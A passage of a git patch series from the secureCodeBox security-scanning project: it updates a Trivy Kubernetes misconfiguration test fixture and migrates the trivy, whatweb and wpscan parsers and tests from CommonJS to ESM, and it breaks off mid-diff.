"Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", - }, - { - "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "LOW", - }, { "attributes": { "fixedVersion": undefined, @@ -170868,6 +171092,35 @@ commonly used by applications.", ], "severity": "HIGH", }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv046", + }, + { + "type": "URL", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + }, + ], + "severity": "HIGH", + }, { "attributes": { "fixedVersion": undefined, @@ -171045,24 +171298,24 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", + "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", "installedVersion": undefined, "packageName": undefined, "references": [ "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://avd.aquasec.com/misconfig/ksv046", ], }, "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", @@ -171074,24 +171327,24 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", + "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", @@ -171419,35 +171672,6 @@ commonly used by applications.", ], "severity": "HIGH", }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRoleBinding/admin-user' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV111", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv111", - ], - }, - "category": "Misconfiguration", - "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", - "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=admin-user", - "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", - "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'admin-user' with role 'cluster-admin' should be used only when required)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv111", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - }, - ], - "severity": "MEDIUM", - }, { "attributes": { "fixedVersion": undefined, diff --git a/scanners/trivy/parser/parser.js b/scanners/trivy/parser/parser.js index 5f98629f5d..d5b302aaeb 100644 --- a/scanners/trivy/parser/parser.js +++ b/scanners/trivy/parser/parser.js @@ -2,18 +2,13 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { + if (!fileContent) { + return []; + } // The first scan always contains the image id a similar format to: "bkimminich/juice-shop:v10.2.0 (alpine 3.11.5)" - let scanResults = fileContent; - if (typeof fileContent === "string") { - if (fileContent.includes("{") && fileContent.includes("}")) { - scanResults = JSON.parse(fileContent); - } else { - // empty file - return []; - } - } + const scanResults = JSON.parse(fileContent); if (Object.prototype.hasOwnProperty.call(scanResults, "ClusterName")) { // Results of k8s-scans always contain an attribute 'ClusterName' at first position of the JSON document. @@ -131,7 +126,7 @@ function parseK8sScanResults(clusterName, scanResults) { } if (!scanResults.Resources || scanResults.Resources.length === 0) { - reject(new Error("No resources listet in scan-result document")); + reject(new Error("No resources listed in scan-result document")); } const findings = scanResults.Resources.flatMap((resourceItem) => @@ -322,5 +317,3 @@ function getAdjustedSeverity(severity) { ? "INFORMATIONAL" : severity; } - -module.exports.parse = parse; diff --git a/scanners/trivy/parser/parser.test.js b/scanners/trivy/parser/parser.test.js index 982b8315c9..a490acd744 100644 --- a/scanners/trivy/parser/parser.test.js +++ b/scanners/trivy/parser/parser.test.js @@ -10,10 +10,11 @@ const { const { parse } = require("./parser"); test("parses bkimminich/juice-shop:v10.2.0 result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v10.2.0.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v10.2.0.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -21,10 +22,11 @@ test("parses bkimminich/juice-shop:v10.2.0 result file into findings", async () }); test("parses bkimminich/juice-shop:v12.10.2 result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -32,10 +34,11 @@ test("parses bkimminich/juice-shop:v12.10.2 result file into findings", async () }); test("parses securecodebox:master result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/securecodebox-repo.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/securecodebox-repo.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -43,13 +46,11 @@ test("parses securecodebox:master result file into findings", async () => { }); test("should properly parse a json file with no .Results", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/juice-shop-v12.10.2-no-results.json", - { - encoding: "utf8", - }, - ), + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2-no-results.json", + { + encoding: "utf8", + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -57,10 +58,11 @@ test("should properly parse a json file with no .Results", async () => { }); test("should parse a trivy-k8s scan result of a cluster running secureCodeBox itself", async () => { - const jsonContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/local-k8s-scan-result.json", { + const jsonContent = await readFile( + __dirname + "/__testFiles__/local-k8s-scan-result.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -68,13 +70,11 @@ test("should parse a trivy-k8s scan result of a cluster running secureCodeBox it }); test("should report an error in case of unexpected attributes in a trivy-k8s scan result", async () => { - const jsonContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/k8s-results_unexpected-attribute.json", - { - encoding: "utf8", - }, - ), + const jsonContent = await readFile( + __dirname + "/__testFiles__/k8s-results_unexpected-attribute.json", + { + encoding: "utf8", + }, ); await expect(parse(jsonContent)).rejects.toThrow( "Unexpected attribute 'Secrets' on resource-item", @@ -82,10 +82,11 @@ test("should report an error in case of unexpected attributes in a trivy-k8s sca }); test("should parse a trivy-k8s scan result", async () => { - const jsonContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/trivy--k8s-scan-results.json", { + const jsonContent = await readFile( + __dirname + "/__testFiles__/trivy--k8s-scan-results.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -93,13 +94,11 @@ test("should parse a trivy-k8s scan result", async () => { }); test("should properly parse a json file with empty .Results", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/juice-shop-v12.10.2-empty-results.json", - { - encoding: "utf8", - }, - ), + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2-empty-results.json", + { + encoding: "utf8", + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); From 361de977742cdd9a56adb7df93d5c38bae544877 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 16:42:39 +0200 Subject: [PATCH 077/137] Migrate whatweb to esm --- .github/workflows/ci.yaml | 2 +- scanners/whatweb/Taskfile.yaml | 16 ++++++ .../whatweb/integration-tests/whatweb.test.js | 18 +++---- .../parser/__testFiles__/invalid-args.json | 1 + .../__testFiles__/invalid-args.json.license | 3 ++ scanners/whatweb/parser/parser.js | 18 +++++-- scanners/whatweb/parser/parser.test.js | 50 ++++++++++++------- 7 files changed, 77 insertions(+), 31 deletions(-) create mode 100644 scanners/whatweb/Taskfile.yaml create mode 100644 scanners/whatweb/parser/__testFiles__/invalid-args.json create mode 100644 scanners/whatweb/parser/__testFiles__/invalid-args.json.license diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 06b24a0c1f..adfe01b68d 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -434,7 +434,7 @@ jobs: - sslyze - trivy - trivy-sbom - # - whatweb + - whatweb # - wpscan - zap-automation-framework steps: diff --git a/scanners/whatweb/Taskfile.yaml b/scanners/whatweb/Taskfile.yaml new file mode 100644 index 0000000000..153a094fc5 --- /dev/null +++ b/scanners/whatweb/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: whatweb + +tasks: + predeploy: + deps: + - demo-targets:deploy:nginx + cmds: [] diff --git a/scanners/whatweb/integration-tests/whatweb.test.js b/scanners/whatweb/integration-tests/whatweb.test.js index a304a734d2..32c0ac36ef 100644 --- a/scanners/whatweb/integration-tests/whatweb.test.js +++ b/scanners/whatweb/integration-tests/whatweb.test.js @@ -2,17 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( - "Whatweb scans example.com", + "Whatweb scans static nginx", async () => { const { categories, severities, count } = await scan( "whatweb-example", "whatweb", - ["example.com"], + ["nginx.demo-targets.svc"], 90, ); @@ -28,7 +26,7 @@ test( } `); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); test( @@ -36,12 +34,14 @@ test( async () => { await expect( scan( - "whatweb-invalidArg", + "whatweb-invalid-arg", "whatweb", ["--invalidArg", "example.com"], 90, ), - ).rejects.toThrow("HTTP request failed"); + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Parser. This is likely a Bug, we would like to know about. Please open up a Issue on GitHub."', + ); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/whatweb/parser/__testFiles__/invalid-args.json b/scanners/whatweb/parser/__testFiles__/invalid-args.json new file mode 100644 index 0000000000..558ed37d93 --- /dev/null +++ b/scanners/whatweb/parser/__testFiles__/invalid-args.json @@ -0,0 +1 @@ +[ diff --git a/scanners/whatweb/parser/__testFiles__/invalid-args.json.license b/scanners/whatweb/parser/__testFiles__/invalid-args.json.license new file mode 100644 index 0000000000..3034c0d74b --- /dev/null +++ b/scanners/whatweb/parser/__testFiles__/invalid-args.json.license @@ -0,0 +1,3 @@ +SPDX-FileCopyrightText: the secureCodeBox authors + +SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/scanners/whatweb/parser/parser.js b/scanners/whatweb/parser/parser.js index f4cf033cde..1830fc9e05 100644 --- a/scanners/whatweb/parser/parser.js +++ b/scanners/whatweb/parser/parser.js @@ -2,8 +2,20 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { - const targets = await parseResultFile(fileContent); +export async function parse(fileContent) { + if (!fileContent) { + return []; + } + if (fileContent === "[\n") { + throw new Error( + "Parser received an invalid report file. This can happen when whatweb is passed invalid arguments. Check the scan configuration.", + ); + } + const report = JSON.parse(fileContent); + if (!report || !Array.isArray(report)) { + return []; + } + const targets = await parseResultFile(report); return transformToFindings(targets); } @@ -88,5 +100,3 @@ function parseResultFile(fileContent) { } return targetList; } - -module.exports.parse = parse; diff --git a/scanners/whatweb/parser/parser.test.js b/scanners/whatweb/parser/parser.test.js index 97ed04a773..5e833a0cfc 100644 --- a/scanners/whatweb/parser/parser.test.js +++ b/scanners/whatweb/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse whatweb json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/example.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/example.com.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings @@ -42,10 +41,11 @@ test("should properly parse whatweb json file", async () => { }); test("should properly parse empty whatweb json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/no-address.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/no-address.com.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings @@ -54,10 +54,11 @@ test("should properly parse empty whatweb json file", async () => { }); test("should properly parse securecodebox.io whatweb json file with higher aggression level(3)", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/securecodebox.io.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/securecodebox.io.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings @@ -131,10 +132,11 @@ test("should properly parse securecodebox.io whatweb json file with higher aggre }); test("should properly parse whatweb json file with two domains", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/two-domains.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/two-domains.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); // validate findings @@ -180,3 +182,17 @@ test("should properly parse whatweb json file with two domains", async () => { ] `); }); + +test("should throw a clear error when the parser recieves a invalid report due to scanner missconfig", async () => { + const fileContent = await readFile( + __dirname + "/__testFiles__/invalid-args.json", + { + encoding: "utf8", + }, + ); + + // validate findings + await expect(parse(fileContent)).rejects.toThrow( + "Parser received an invalid report file. This can happen when whatweb is passed invalid arguments. Check the scan configuration.", + ); +}); From 94695a66ad603eae2ec98b1c8852ce9fd8a1559f Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 16:53:45 +0200 Subject: [PATCH 078/137] Migrate wpscan to esm --- .github/workflows/ci.yaml | 2 +- scanners/wpscan/Taskfile.yaml | 16 +++++++ .../wpscan/integration-tests/wpscan.test.js | 4 +- scanners/wpscan/parser/parser.js | 42 ++++++++++--------- scanners/wpscan/parser/parser.test.js | 22 +++++----- 5 files changed, 52 insertions(+), 34 deletions(-) create mode 100644 scanners/wpscan/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index adfe01b68d..503a31da50 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -435,7 +435,7 @@ jobs: - trivy - trivy-sbom - whatweb - # - wpscan + - wpscan - zap-automation-framework steps: - name: Checkout diff --git a/scanners/wpscan/Taskfile.yaml b/scanners/wpscan/Taskfile.yaml new file mode 100644 index 0000000000..6f71a66869 --- /dev/null +++ b/scanners/wpscan/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: wpscan + +tasks: + predeploy: + deps: + - demo-targets:deploy:old-wordpress + cmds: [] diff --git a/scanners/wpscan/integration-tests/wpscan.test.js b/scanners/wpscan/integration-tests/wpscan.test.js index ef1396d399..5c6653a39e 100644 --- a/scanners/wpscan/integration-tests/wpscan.test.js +++ b/scanners/wpscan/integration-tests/wpscan.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "WPScan should find at least 1 finding regarding the old-wordpress demo app", diff --git a/scanners/wpscan/parser/parser.js 